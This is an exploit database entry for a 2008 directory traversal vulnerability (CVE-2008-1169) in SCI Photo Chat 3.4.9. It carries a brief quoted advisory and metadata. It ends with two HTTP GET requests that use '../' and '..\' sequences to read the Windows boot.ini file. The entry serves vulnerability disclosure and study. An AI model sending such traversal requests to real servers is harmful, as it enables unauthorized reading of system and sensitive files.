SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal

Author: Luigi Auriemma
type: remote
platform: windows
port: 
date_added: 2008-02-19  
date_updated: 2014-01-28  
verified: 1  
codes: CVE-2008-1169;OSVDB-43071  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 31231.txt  

source: https://www.securityfocus.com/bid/27872/info

SCI Photo Chat is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.

This issue affects SCI Photo Chat 3.4.9 and prior versions.

GET /docs/..\..\..\..\..\boot.ini HTTP/1.0
GET /docs/../../../../../boot.ini HTTP/1.0